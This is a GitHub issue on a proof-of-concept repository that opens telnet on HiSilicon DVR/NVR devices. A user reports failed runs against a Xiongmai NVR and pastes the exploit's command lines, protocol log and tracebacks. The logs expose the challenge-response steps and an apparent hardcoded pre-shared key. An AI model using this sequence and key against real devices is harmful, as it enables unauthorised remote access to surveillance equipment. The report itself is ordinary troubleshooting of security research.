search

tothi / hs-dvr-telnet

open telnet port on modern HiSilicon devices
51 stars 24 forks source link

doesn't work for me #2

Open pauldvg opened 4 years ago

pauldvg commented 4 years ago

Hello,

The PoC does not work on my xiongmaitech AHB7804R NVR (HiSilicon Hi3520) with the latest firmware (V3_V4.03.R11.7601).

When I run it I get : 

(venv) paul@paul-VirtualBox:~/hs-dvr-telnet$ ./hs-dvr-telnet.py 192.168.1.24 live3636
[+] Opening connection to 192.168.1.24 on port 9530: Done
[*] sending OpenTelnet:OpenOnce...
[*] received challenge randNum:34929138
[*] using password live3636
[*] initializing (modified) 3des with key 34929138live3636
[*] sending encrypted challenge 8B:CB:CB:2B:86:85:0A:8C:D7:99:AB:6D:B8:D8:55:E4
Traceback (most recent call last):
  File "./hs-dvr-telnet.py", line 54, in <module>
    dvrHelper.open_telnet(args.password)
  File "./hs-dvr-telnet.py", line 37, in open_telnet
    assert self.recv(2) == b"OK"
AssertionError

And then the 9530 port closes (I don't see it anymore on nmap) When I launch the script a second time I get : 

(venv) paul@paul-VirtualBox:~/hs-dvr-telnet$ ./hs-dvr-telnet.py 192.168.1.24 live3636
[-] Opening connection to 192.168.1.24 on port 9530: Failed
[ERROR] Could not connect to 192.168.1.24 on port 9530
Traceback (most recent call last):
  File "./hs-dvr-telnet.py", line 53, in <module>
    dvrHelper = DvrHelper(args.host, PORT)
  File "/home/paul/hs-dvr-telnet/venv/lib/python3.6/site-packages/pwnlib/tubes/remote.py", line 75, in __init__
    self.sock   = self._connect(fam, typ)
  File "/home/paul/hs-dvr-telnet/venv/lib/python3.6/site-packages/pwnlib/tubes/remote.py", line 115, in _connect
    self.error("Could not connect to %s on port %d" % (self.rhost, self.rport))
  File "/home/paul/hs-dvr-telnet/venv/lib/python3.6/site-packages/pwnlib/log.py", line 417, in error
    raise PwnlibException(message % args)
pwnlib.exception.PwnlibException: Could not connect to 192.168.1.24 on port 9530

Rebooting the NVR reopen the 9530 port.

Thank you

pauldvg commented 4 years ago

I posted too fast and thought that the PSK argument was the admin password of the nvr gui. When I use ./hs-dvr-telnet 192.168.1.24 2wj9fsa2 (or ./hs-dvr-telnet 192.168.1.24) I get : 

(venv) paul@paul-VirtualBox:~/hs-dvr-telnet$ ./hs-dvr-telnet.py 192.168.1.24 2wj9fsa2
[+] Opening connection to 192.168.1.24 on port 9530: Done
[*] sending OpenTelnet:OpenOnce...
[*] received challenge randNum:78483811
[*] using password 2wj9fsa2
[*] initializing (modified) 3des with key 784838112wj9fsa2
[*] sending encrypted challenge 83:EF:D3:4E:DC:BE:BB:2E:93:EE:A3:80:58:62:A3:39
[+] verify:OK
[*] sending encrypted command Telnet:OpenOnce...
Traceback (most recent call last):
  File "./hs-dvr-telnet.py", line 54, in <module>
    dvrHelper.open_telnet(args.password)
  File "./hs-dvr-telnet.py", line 42, in open_telnet
    self.recvuntil("Open:")
  File "/home/paul/hs-dvr-telnet/venv/lib/python3.6/site-packages/pwnlib/tubes/tube.py", line 310, in recvuntil
    res = self.recv(timeout=self.timeout)
  File "/home/paul/hs-dvr-telnet/venv/lib/python3.6/site-packages/pwnlib/tubes/tube.py", line 82, in recv
    return self._recv(numb, timeout) or b''
  File "/home/paul/hs-dvr-telnet/venv/lib/python3.6/site-packages/pwnlib/tubes/tube.py", line 160, in _recv
    if not self.buffer and not self._fillbuffer(timeout):
  File "/home/paul/hs-dvr-telnet/venv/lib/python3.6/site-packages/pwnlib/tubes/tube.py", line 131, in _fillbuffer
    data = self.recv_raw(self.buffer.get_fill_size())
  File "/home/paul/hs-dvr-telnet/venv/lib/python3.6/site-packages/pwnlib/tubes/sock.py", line 56, in recv_raw
    raise EOFError
EOFError

Thank you